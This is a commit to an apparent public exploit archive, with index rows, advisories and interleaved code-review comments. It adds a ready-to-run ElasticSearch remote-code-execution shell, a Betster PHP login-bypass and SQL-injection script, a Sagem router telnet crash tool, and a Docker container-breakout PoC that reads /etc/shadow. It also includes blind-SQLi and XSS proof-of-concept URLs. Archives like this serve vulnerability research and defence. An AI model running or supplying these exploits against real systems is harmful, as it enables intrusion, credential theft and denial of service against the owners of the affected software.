Update: 2015-03-13

22 new exploits
Offensive Security 2015-03-13 08:35:51 +00:00
parent db442f2fc9
commit f8f13f8ec0
24 changed files with 775 additions and 99 deletions

@ -7391,7 +7391,7 @@ id,file,description,date,author,platform,type,port
7853,platforms/windows/local/7853.pl,"EleCard MPEG PLAYER - (.m3u ) Local Stack Overflow Exploit",2009-01-25,AlpHaNiX,windows,local,0
7854,platforms/windows/dos/7854.pl,"MediaMonkey 3.0.6 - (.m3u) Local Buffer Overflow PoC",2009-01-25,AlpHaNiX,windows,dos,0
7855,platforms/linux/local/7855.txt,"PostgreSQL 8.2/8.3/8.4 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7856,platforms/linux/local/7856.txt,"MySQL 4/5/6 - UDF for Command Execution",2009-01-25,"Bernardo Damele",linux,local,0
7857,platforms/windows/dos/7857.pl,"Merak Media Player 3.2 m3u file Local Buffer Overflow PoC",2009-01-25,Houssamix,windows,dos,0
7858,platforms/hardware/remote/7858.php,"Siemens ADSL SL2-141 - CSRF Exploit",2009-01-25,spdr,hardware,remote,0
7859,platforms/php/webapps/7859.pl,"MemHT Portal <= 4.0.1 (avatar) Remote Code Execution Exploit",2009-01-25,StAkeR,php,webapps,0
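Review bot: Title-only normalization of row 7856 (a " - " separator inserted after "MySQL 4/5/6"), matching the form of the neighbouring 7853 and 7854 rows; no functional impact, but the sibling row 7855 ("PostgreSQL 8.2/8.3/8.4 UDF for Command Execution") was left in the old form and should get the same separator in this pass.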
@ -30456,7 +30456,7 @@ id,file,description,date,author,platform,type,port
33804,platforms/windows/dos/33804.pl,"Ubisoft Rayman Legends 1.2.103716 - Remote Stack Buffer Overflow Vulnerability",2014-06-18,LiquidWorm,windows,dos,0
33805,platforms/linux/remote/33805.pl,"AlienVault OSSIM < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution",2014-06-18,"Alfredo Ramirez",linux,remote,0
33807,platforms/multiple/remote/33807.rb,"Rocket Servergraph Admin Center fileRequestor Remote Code Execution",2014-06-18,metasploit,multiple,remote,8888
33808,platforms/linux/local/33808.c,"docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33808,platforms/linux/local/33808.c,"Docker 0.11 - VMM-Container Breakout",2014-06-18,"Sebastian Krahmer",linux,local,0
33809,platforms/php/webapps/33809.txt,"Cacti Superlinks Plugin 1.4-2 - SQL Injection",2014-06-18,Napsterakos,php,webapps,0
33810,platforms/osx/remote/33810.html,"Apple Safari for iPhone/iPod touch Malformed 'Throw' Exception Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
33811,platforms/osx/remote/33811.html,"Apple Safari iPhone/iPod touch Malformed Webpage Remote Code Execution Vulnerability",2010-03-26,"Nishant Das Patnaik",osx,remote,0
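Review bot: Capitalization-only change for row 33808 ("docker" to "Docker"). Fine as a cleanup, but cosmetic title fixes to old rows are better committed separately from a "22 new exploits" update so the additions stay reviewable on their own.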
@ -32724,8 +32724,11 @@ id,file,description,date,author,platform,type,port
36302,platforms/php/webapps/36302.txt,"Joomla Content Component 'year' Parameter SQL Injection Vulnerability",2011-11-14,E.Shahmohamadi,php,webapps,0
36303,platforms/php/webapps/36303.txt,"ProjectSend r561 - SQL Injection Vulnerability",2015-03-06,"ITAS Team",php,webapps,80
36304,platforms/windows/remote/36304.rb,"HP Data Protector 8.10 Remote Command Execution",2015-03-06,metasploit,windows,remote,5555
36305,platforms/php/webapps/36305.txt,"Elastix 2.x - Blind SQL Injection Vulnerability",2015-03-07,"Ahmed Aboul-Ela",php,webapps,0
36306,platforms/php/webapps/36306.txt,"PHP Betoffice (Betster) 1.0.4 - Authentication Bypass And SQL Injection",2015-03-06,ZeQ3uL,php,webapps,0
36307,platforms/php/webapps/36307.html,"Search Plugin for Hotaru CMS 1.4.2 admin_index.php SITE_NAME Parameter XSS",2011-11-13,"Gjoko Krstic",php,webapps,0
36308,platforms/php/webapps/36308.txt,"Webistry 1.6 'pid' Parameter SQL Injection Vulnerability",2011-11-16,CoBRa_21,php,webapps,0
36309,platforms/hardware/dos/36309.py,"Sagem F@st 3304-V2 - Telnet Crash PoC",2015-03-08,"Loudiyi Mohamed",hardware,dos,0
36310,platforms/lin_x86-64/local/36310.txt,"Rowhammer: Linux Kernel Privilege Escalation PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0
36311,platforms/lin_x86-64/local/36311.txt,"Rowhammer: NaCl Sandbox Escape PoC",2015-03-09,"Google Security Research",lin_x86-64,local,0
36313,platforms/php/webapps/36313.txt,"webERP <= 4.3.8 Multiple Script URI XSS",2011-11-17,"High-Tech Bridge SA",php,webapps,0
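Review bot: The new rows 36309, 36310 and 36311 are followed by the existing row 36313, so ID 36312 is skipped; confirm that is an intentionally withheld entry rather than a dropped line. Row 36309 also records port 0 although the Sagem PoC added in this commit connects to telnet port 23; the ElasticSearch row in the next hunk records its port (9200), so this one should read 23 for consistency.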
@ -32749,3 +32752,22 @@ id,file,description,date,author,platform,type,port
36331,platforms/php/webapps/36331.txt,"Dolibarr ERP/CRM /user/index.php Multiple Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
36332,platforms/php/webapps/36332.txt,"Dolibarr ERP/CRM /user/info.php id Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
36333,platforms/php/webapps/36333.txt,"Dolibarr ERP/CRM /admin/boxes.php rowid Parameter SQL Injection",2011-11-23,"High-Tech Bridge SA",php,webapps,0
36334,platforms/windows/dos/36334.txt,"Foxit Products GIF Conversion Memory Corruption (LZWMinimumCodeSize)",2015-03-11,"Francis Provencher",windows,dos,0
36335,platforms/windows/dos/36335.txt,"Foxit Products GIF Conversion Memory Corruption (DataSubBlock)",2015-03-11,"Francis Provencher",windows,dos,0
36336,platforms/windows/dos/36336.txt,"Microsoft Windows Text Services Memory Corruption (MS15-020)",2015-03-11,"Francis Provencher",windows,dos,0
36337,platforms/linux/remote/36337.py,"ElasticSearch Unauthenticated Remote Code Execution",2015-03-11,"Xiphos Research Ltd",linux,remote,9200
36338,platforms/php/webapps/36338.txt,"WordPress ClickDesk Live Support Plugin 2.0 'cdwidget' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36339,platforms/php/webapps/36339.txt,"WordPress Featurific For WordPress Plugin 1.6.2 'snum' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36340,platforms/php/webapps/36340.txt,"WordPress Newsletter Meenews Plugin 5.1 'idnews' Parameter Cross Site Scripting Vulnerability",2011-11-23,Amir,php,webapps,0
36341,platforms/php/webapps/36341.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/kit_mondialrelay/RechercheDetailPointRelais_ajax.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36342,platforms/php/webapps/36342.txt,"PrestaShop 1.4.4.1 modules/mondialrelay/googlemap.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36343,platforms/php/webapps/36343.txt,"PrestaShop 1.4.4.1 /modules/mondialrelay/kit_mondialrelay/SuiviExpedition_ajax.php Expedition Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36344,platforms/php/webapps/36344.txt,"PrestaShop 1.4.4.1 /admin/ajaxfilemanager/ajax_save_text.php Multiple Parameter XSS",2011-11-23,Prestashop,php,webapps,0
36345,platforms/php/webapps/36345.txt,"Prestashop 1.4.4.1 'displayImage.php' HTTP Response Splitting Vulnerability",2011-11-23,RGouveia,php,webapps,0
36346,platforms/php/webapps/36346.txt,"Zen Cart CMS 1.3.9h Multiple Cross Site Scripting Vulnerabilities",2011-11-23,RPinto,php,webapps,0
36347,platforms/php/webapps/36347.txt,"Hastymail2 'rs' Parameter Cross Site Scripting Vulnerability",2011-11-22,HTrovao,php,webapps,0
36348,platforms/php/webapps/36348.txt,"Pro Clan Manager 0.4.2 SQL Injection Vulnerability",2011-11-23,anonymous,php,webapps,0
36349,platforms/php/webapps/36349.txt,"AdaptCMS 2.0 SQL Injection Vulnerability",2011-11-24,X-Cisadane,php,webapps,0
36350,platforms/php/webapps/36350.txt,"Balitbang CMS 3.3 index.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0
36351,platforms/php/webapps/36351.txt,"alitbang CMS 3.3 alumni.php hal Parameter SQL Injection",2011-11-24,X-Cisadane,php,webapps,0
36352,platforms/linux/remote/36352.txt,"Apache HTTP Server 7.0.x 'mod_proxy' Reverse Proxy Security Bypass Vulnerability",2011-11-24,"Prutha Parikh",linux,remote,0
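Review bot: Row 36351 has a typo in its title, "alitbang CMS 3.3", which should read "Balitbang CMS 3.3" as in row 36350 from the same author and date. Two smaller points: row 36345 spells the vendor "Prestashop" while rows 36341-36344 use "PrestaShop" (this same commit normalizes "docker" to "Docker" above, so the same consistency applies here), and row 36352's "Apache HTTP Server 7.0.x" does not match any httpd release line while the advisory file added for it names no version at all, so the version should be checked against BID 50802 before merge.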

platforms/hardware/dos/36309.py Executable file
@ -0,0 +1,40 @@
# Title : Sagem F@st 3304-V2 Telnet Crash POC
# Vendor : http://www.sagemcom.com
# Severity : High
# Tested Router : Sagem F@st 3304-V2 (3304-V1, other versions may also be affected)
# Date : 2015-03-08
# Author : Loudiyi Mohamed
# Contact : Loudiyi.2010@gmail.com
# Blog : https://www.linkedin.com/pub/mohamed-loudiyi/86/81b/603
# Vulnerability description:
#==========================
#A Memory Corruption Vulnerability is detected on Sagem F@st 3304-V2 Telnet service. An attacker can crash the router by sending a very long string.
#This exploit connects to Sagem F@st 3304-V2 Telnet (Default port 23) and sends a very long string "X"*500000.
#After the exploit is sent, the telnet service will crash and the router will reboot automatically.
#Usage: python SagemDos.py "IP address"
# Code
#========================================================================
#!/usr/bin/python
import socket
import sys
print("######################################")
print("# DOS Sagem F@st3304 v1-v2 #")
print("# ---------- #")
print("# BY LOUDIYI MOHAMED #")
print("#####################################")
if (len(sys.argv)<2):
print "Usage: %s <host> " % sys.argv[0]
print "Example: %s 192.168.1.1 " % sys.argv[0]
exit(0)
print "\nSending evil buffer..."
s = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
s.connect((sys.argv[1], 23))
buffer = "X"*500000
s.send(buffer)
except:
print "Could not connect to Sagem Telnet!"
#========================================================================
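Review bot: The interpreter line "#!/usr/bin/python" sits after the header comments rather than on line 1, so it has no effect even though the file is marked executable; move it to the top. The script also mixes print() calls with Python 2 print statements, which only parse under Python 2, and the usage branch calls exit(0) where a non-zero status is expected. The usage comment names the file "SagemDos.py" while the archived file is 36309.py.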

@ -47,142 +47,141 @@
struct my_file_handle {
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
unsigned int handle_bytes;
int handle_type;
unsigned char f_handle[8];
};
void die(const char *msg)
{
perror(msg);
exit(errno);
perror(msg);
exit(errno);
}
void dump_handle(const struct my_file_handle *h)
{
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
h->handle_type);
for (int i = 0; i < h->handle_bytes; ++i) {
fprintf(stderr,"0x%02x", h->f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr,"\n");
if (i < h->handle_bytes - 1)
fprintf(stderr,", ");
}
fprintf(stderr,"};\n");
fprintf(stderr,"[*] #=%d, %d, char nh[] = {", h->handle_bytes,
h->handle_type);
for (int i = 0; i < h->handle_bytes; ++i) {
fprintf(stderr,"0x%02x", h->f_handle[i]);
if ((i + 1) % 20 == 0)
fprintf(stderr,"\n");
if (i < h->handle_bytes - 1)
fprintf(stderr,", ");
}
fprintf(stderr,"};\n");
}
int find_handle(int bfd, const char *path, const struct my_file_handle *ih, struct my_file_handle *oh)
{
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
int fd;
uint32_t ino = 0;
struct my_file_handle outh = {
.handle_bytes = 8,
.handle_type = 1
};
DIR *dir = NULL;
struct dirent *de = NULL;
path = strchr(path, '/');
path = strchr(path, '/');
// recursion stops if path has been resolved
if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
// recursion stops if path has been resolved
if (!path) {
memcpy(oh->f_handle, ih->f_handle, sizeof(oh->f_handle));
oh->handle_type = 1;
oh->handle_bytes = 8;
return 1;
}
++path;
fprintf(stderr, "[*] Resolving '%s'\n", path);
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((fd = open_by_handle_at(bfd, (struct file_handle *)ih, O_RDONLY)) < 0)
die("[-] open_by_handle_at");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
if ((dir = fdopendir(fd)) == NULL)
die("[-] fdopendir");
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}
for (;;) {
de = readdir(dir);
if (!de)
break;
fprintf(stderr, "[*] Found %s\n", de->d_name);
if (strncmp(de->d_name, path, strlen(de->d_name)) == 0) {
fprintf(stderr, "[+] Match: %s ino=%d\n", de->d_name, (int)de->d_ino);
ino = de->d_ino;
break;
}
}
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
fprintf(stderr, "[*] Brute forcing remaining 32bit. This can take a while...\n");
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if (de) {
for (uint32_t i = 0; i < 0xffffffff; ++i) {
outh.handle_bytes = 8;
outh.handle_type = 1;
memcpy(outh.f_handle, &ino, sizeof(ino));
memcpy(outh.f_handle + 4, &i, sizeof(i));
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
if ((i % (1<<20)) == 0)
fprintf(stderr, "[*] (%s) Trying: 0x%08x\n", de->d_name, i);
if (open_by_handle_at(bfd, (struct file_handle *)&outh, 0) > 0) {
closedir(dir);
close(fd);
dump_handle(&outh);
return find_handle(bfd, path, &outh, oh);
}
}
}
closedir(dir);
close(fd);
return 0;
closedir(dir);
close(fd);
return 0;
}
int main()
{
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};
char buf[0x1000];
int fd1, fd2;
struct my_file_handle h;
struct my_file_handle root_h = {
.handle_bytes = 8,
.handle_type = 1,
.f_handle = {0x02, 0, 0, 0, 0, 0, 0, 0}
};
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
fprintf(stderr, "[***] docker VMM-container breakout Po(C) 2014 [***]\n"
"[***] The tea from the 90's kicks your sekurity again. [***]\n"
"[***] If you have pending sec consulting, I'll happily [***]\n"
"[***] forward to my friends who drink secury-tea too! [***]\n\n<enter>\n");
read(0, buf, 1);
read(0, buf, 1);
// get a FS reference from something mounted in from outside
if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
die("[-] open");
// get a FS reference from something mounted in from outside
if ((fd1 = open("/.dockerinit", O_RDONLY)) < 0)
die("[-] open");
if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");
if (find_handle(fd1, "/etc/shadow", &root_h, &h) <= 0)
die("[-] Cannot find valid handle!");
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);
fprintf(stderr, "[!] Got a final handle!\n");
dump_handle(&h);
if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");
if ((fd2 = open_by_handle_at(fd1, (struct file_handle *)&h, O_RDONLY)) < 0)
die("[-] open_by_handle");
memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");
memset(buf, 0, sizeof(buf));
if (read(fd2, buf, sizeof(buf) - 1) < 0)
die("[-] read");
fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
fprintf(stderr, "[!] Win! /etc/shadow output follows:\n%s\n", buf);
close(fd2); close(fd1);
close(fd2); close(fd1);
return 0;
return 0;
}
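Review bot: This hunk is an indentation-only rewrite of the archived PoC (each removed block reappears unchanged apart from leading whitespace, with one blank line dropped per the -142/+141 counts). Reformatting a third-party file as received makes later diffs against the upstream PoC noisier; either keep the original indentation or commit the reformat separately from the new-exploit additions. Unrelated to the reindent but worth a comment in the file: dump_handle prints the unsigned handle_bytes with "%d", which should be "%u".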

platforms/linux/remote/36337.py Executable file
@ -0,0 +1,56 @@
#!/bin/python2
# coding: utf-8
# Author: Darren Martyn, Xiphos Research Ltd.
# Version: 20150309.1
# Licence: WTFPL - wtfpl.net
import json
import requests
import sys
import readline
readline.parse_and_bind('tab: complete')
readline.parse_and_bind('set editing-mode vi')
__version__ = "20150309.1"
def banner():
print """\x1b[1;32m
?????? ??? ??? ?????? ????????? ??? ?????? ?????? ??? ?? ?????? ??? ???
?? ? ???? ?????? ??? ? ? ??? ?????????? ?? ??? ? ???? ????? ? ???? ????
???? ???? ??? ??? ? ???? ? ???? ????????? ? ? ???? ???????????? ???? ????
??? ? ???? ????????? ? ???? ???? ? ???????? ???? ? ?????? ??? ??? ? ???? ????
????????????????? ????????????? ???? ? ????? ????? ?????????????????????????????????????????
?? ?? ?? ??? ??? ????? ??? ? ? ? ?? ?? ? ?? ? ?? ??? ? ? ? ??????? ?? ?? ??? ?? ??? ?
? ? ?? ? ? ? ? ?? ?? ?? ? ? ? ? ? ? ? ? ?? ? ? ? ??? ? ? ? ?? ? ? ?? ? ? ?
? ? ? ? ? ? ? ? ? ? ?? ? ? ? ? ?? ? ? ? ? ? ?
? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ? ?
?
Exploit for ElasticSearch , CVE-2015-1427 Version: %s\x1b[0m""" %(__version__)
def execute_command(target, command):
payload = """{"size":1, "script_fields": {"lupin":{"script": "java.lang.Math.class.forName(\\"java.lang.Runtime\\").getRuntime().exec(\\"%s\\").getText()"}}}""" %(command)
try:
url = "http://%s:9200/_search?pretty" %(target)
r = requests.post(url=url, data=payload)
except Exception, e:
sys.exit("Exception Hit"+str(e))
values = json.loads(r.text)
fuckingjson = values['hits']['hits'][0]['fields']['lupin'][0]
print fuckingjson.strip()
def exploit(target):
print "{*} Spawning Shell on target... Do note, its only semi-interactive... Use it to drop a better payload or something"
while True:
cmd = raw_input("~$ ")
if cmd == "exit":
sys.exit("{!} Shell exiting!")
else:
execute_command(target=target, command=cmd)
def main(args):
banner()
if len(args) != 2:
sys.exit("Use: %s target" %(args[0]))
exploit(target=args[1])
if __name__ == "__main__":
main(args=sys.argv)
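Review bot: The banner block is mojibake (runs of "?" where the box-drawing art was), so the file was stored in an encoding other than the one the "# coding: utf-8" line declares; replace it with ASCII art or drop it. The shebang "#!/bin/python2" is a non-standard path ("#!/usr/bin/env python2" is the portable form), and the "except Exception, e" syntax plus print statements pin the script to Python 2 in any case. Rename the variable "fuckingjson" to something descriptive such as "result".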

@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50802/info
Apache HTTP Server is prone to a security-bypass vulnerability.
Successful exploits will allow attackers to bypass certain security restrictions and obtain sensitive information about running web applications.
The following example patterns are available:
RewriteRule ^(.*) http://www.example.com$1
ProxyPassMatch ^(.*) http://www.example.com$1
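Review bot: The file names no affected version and does not say what the two patterns represent; "The following example patterns are available" reads as general documentation rather than as the affected configurations. State that a RewriteRule or ProxyPassMatch whose target is built as "http://www.example.com$1" from a "^(.*)" capture is the affected form and give the httpd version range from BID 50802, since the CSV row for 36352 currently says "7.0.x", which is not an httpd release line.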

platforms/php/webapps/36305.txt Executable file
@ -0,0 +1,47 @@
# Title: Elastix v2.x Blind SQL Injection Vulnerability
# Author: Ahmed Aboul-Ela
# Twitter: https://twitter.com/aboul3la
# Vendor : http://www.elastix.org
# Version: v2.5.0 and prior versions should be affected too
- Vulnerable Source Code snippet in "a2billing/customer/iridium_threed.php":
<?php
[...]
line 5: getpost_ifset (array('transactionID', 'sess_id', 'key', 'mc_currency', 'currency', 'md5sig',
'merchant_id', 'mb_amount', 'status','mb_currency','transaction_id', 'mc_fee', 'card_number'));
line 34: $QUERY = "SELECT id, cardid, amount, vat, paymentmethod, cc_owner, cc_number, cc_expires,
creationdate, status, cvv, credit_card_type,currency, item_id, item_type " .
" FROM cc_epayment_log " . " WHERE id = ".$transactionID;
line 37: $transaction_data = $paymentTable->SQLExec ($DBHandle_max, $QUERY);
[...]
?>
The GET parameter transactionID was used directly in the SQL query
without any sanitization which lead directly to SQL Injection vulnerability.
- Proof of Concept:
http://[host]/a2billing/customer/iridium_threed.php?transactionID=-1 and 1=benchmark(2000000,md5(1))
The backend response will delay for few seconds, which means the benchmark() function was executed successfully
- Mitigation:
The vendor has released a fix for the vulnerability. It is strongly recommended to update your elastix server now
[~] yum update elastix-a2billing
- Time-Line:
Sat, Feb 14, 2015 at 2:19 PM: Vulnerability report sent to Elastix
Wed, Feb 18, 2015 at 4:29 PM: Confirmation of the issue from Elastix
Fri, Mar 6, 2015 at 8:39 PM: Elastix released a fix for the vulnerability
Sat, Mar 7, 2015 at 5:15 PM: The public responsible disclosure
- Credits:
Ahmed Aboul-Ela - Cyber Security Analyst @ EG-CERT
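Review bot: The advisory says "The GET parameter transactionID", but the quoted line 5 fetches it through getpost_ifset(), whose name indicates the value is also accepted from POST; say "request parameter" or name both sources so the scope is not understated. Minor wording: "which lead directly" should be "which leads directly".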

platforms/php/webapps/36306.txt Executable file
@ -0,0 +1,151 @@
<?php
/*
,--^----------,--------,-----,-------^--,
| ||||||||| `--------' | O .. CWH Underground Hacking Team ..
`+---------------------------^----------|
`\_,-------, _________________________|
/ XXXXXX /`| /
/ XXXXXX / `\ /
/ XXXXXX /\______(
/ XXXXXX /
/ XXXXXX /
(________(
`------'
Exploit Title : Betster (PHP Betoffice) Authentication Bypass and SQL Injection
Date : 6 March 2015
Exploit Author : CWH Underground
Discovered By : ZeQ3uL
Site : www.2600.in.th
Vendor Homepage : http://betster.sourceforge.net/
Software Link : http://downloads.sourceforge.net/project/betster/betster-1.0.4.zip
Version : 1.0.4
Tested on : Linux, PHP 5.3.9
####################
SOFTWARE DESCRIPTION
####################
Betster is a Software to create a online bet-office based on PHP, MySQL and JavaScript. The system works with variable odds
(betting-exchange with variable decimal odds) and provides a CMS-like backend for handling the bets, users and categories.
################################################################
VULNERABILITY: SQL Injection (showprofile.php, categoryedit.php)
################################################################
An attacker might execute arbitrary SQL commands on the database server with this vulnerability.
User tainted data is used when creating the database query that will be executed on the database management system (DBMS).
An attacker can inject own SQL syntax thus initiate reading, inserting or deleting database entries or attacking the underlying operating system
depending on the query, DBMS and configuration.
/showprofile.php (LINE: 63)
-----------------------------------------------------------------------------
if (($session->getState()) &&
(($user->getStatus() == "administrator") ||
($user->getStatus() == "betmaster"))){
$mainhtml = file_get_contents("tpl/showprofile.inc");
$id = htmlspecialchars($_GET['id']); <<<< WTF !!
$xuser = $db_mapper->getUserById($id);
-----------------------------------------------------------------------------
/categoryedit.php (LINE: 52)
-----------------------------------------------------------------------------
$id = htmlspecialchars($_GET['id']); <<<< WTF !!
$action = htmlspecialchars($_GET['ac']);
-----------------------------------------------------------------------------
###########################################
VULNERABILITY: Authentication Bypass (SQLi)
###########################################
File index.php (Login function) has SQL Injection vulnerability, "username" parameter supplied in POST parameter for checking valid credentials.
The "username" parameter is not validated before passing into SQL query which arise authentication bypass issue.
#####################################################
EXPLOIT
#####################################################
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 50);
function http_send($host, $packet)
{
if (!($sock = fsockopen($host, 80)))
die("\n[-] No response from {$host}:80\n");
fputs($sock, $packet);
return stream_get_contents($sock);
}
print "\n+---------------------------------------------+";
print "\n| Betster Auth Bypass & SQL Injection Exploit |";
print "\n+---------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] <host> <path>\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /betster/\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$payload = "username=admin%27+or+%27a%27%3D%27a&password=cwh&login=LOGIN";
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
print "\n ,--^----------,--------,-----,-------^--, \n";
print " | ||||||||| `--------' | O \n";
print " `+---------------------------^----------| \n";
print " `\_,-------, _________________________| \n";
print " / XXXXXX /`| / \n";
print " / XXXXXX / `\ / \n";
print " / XXXXXX /\______( \n";
print " / XXXXXX / \n";
print " / XXXXXX / .. CWH Underground Hacking Team .. \n";
print " (________( \n";
print " `------' \n";
$response = http_send($host, $packet);
if (!preg_match("/Set-Cookie: ([^;]*);/i", $response, $sid)) die("\n[-] Session ID not found!\n");
$packet = "POST {$path}index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
print "\n\n[+] Bypassing Authentication...\n";
sleep(2);
$response=http_send($host, $packet);
preg_match('/menutitle">ADMIN/s', $response) ? print "\n[+] Authentication Bypass Successfully !!\n" : die("\n[-] Bypass Authentication Failed !!\n");
$packet = "GET {$path}showprofile.php?id=1%27%20and%201=2%20union%20select%201,concat(0x3a3a,0x557365723d,user(),0x202c2044425f4e616d653d,database(),0x3a3a),3,4,5,6,7--+ HTTP/1.0\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Connection: close\r\n\r\n";
print "[+] Performing SQL Injection Attack\n";
sleep(2);
$response1=http_send($host, $packet);
preg_match('/::(.*)::/', $response1, $m) ? print "\n$m[1]\n" : die("\n[-] Exploit failed!\n");
################################################################################################################
# Greetz : ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK, Retool2
################################################################################################################
?>
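Review bot: $path is concatenated as "{$path}index.php" and "{$path}showprofile.php" with nothing enforcing the trailing slash the usage examples ("/", "/betster/") rely on, so a path given as "/betster" yields "/betsterindex.php"; normalize with rtrim($path, '/') . '/' or reject paths without it. Also http_send() hardcodes port 80 and error_reporting(0) hides the resulting connection failures, and the two sleep(2) calls serve no purpose.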

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50778/info
ClickDesk Live Support plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
ClickDesk Live Support 2.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=[xss]

platforms/php/webapps/36339.txt Executable file
@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/50779/info
Featurific For WordPress plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Featurific For WordPress 1.6.2 is vulnerable; other versions may also be affected.
UPDATE April 18, 2012: Further reports indicate this issue may not be a vulnerability; the issue can not be exploited as described.
http://www.example.com/[path]/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=[xss]
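Review bot: The source text carries an "UPDATE April 18, 2012" line stating the issue may not be a vulnerability and cannot be exploited as described, yet the entry is added with no such marker in the CSV row for 36339 or in the file's own title; either flag the entry as disputed or leave it out of the archive.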

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/50783/info
Newsletter Meenews Plugin for WordPress is prone to a cross-site-scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.
Newsletter Meenews 5.1.0 is vulnerable; other versions may also be affected.
http://www.example.com/[path]/wp-content/plugins/meenews/newsletter.php?idnews=[xss]
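Review bot: The file names "Newsletter Meenews 5.1.0" while the CSV row for 36340 says "5.1"; pick one form for both.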

platforms/php/webapps/36341.txt Executable file
@ -0,0 +1,10 @@
source: http://www.securityfocus.com/bid/50784/info
PrestaShop is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks.
PrestaShop 1.4.4.1 is vulnerable; other versions may also be affected.
